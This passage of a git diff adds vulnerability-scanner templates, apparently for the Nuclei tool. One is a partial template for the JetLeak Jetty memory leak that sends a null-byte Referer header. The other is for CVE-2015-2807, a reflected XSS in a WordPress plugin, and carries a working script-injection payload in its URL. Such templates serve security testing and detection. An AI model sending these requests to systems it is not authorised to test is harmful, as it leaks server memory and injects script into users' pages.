- https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
|
||||
- http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
|
||||
description: |
|
||||
The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
|
||||
tags: cve,cve2015,jetty
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/"
|
||||
- "{{BaseURL}}"
|
||||
headers:
|
||||
Referer: \x00
|
||||
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2015-2807
|
||||
|
||||
info:
|
||||
name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
|
||||
tags: cve,cve2015,wordpress,wp-plugin,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue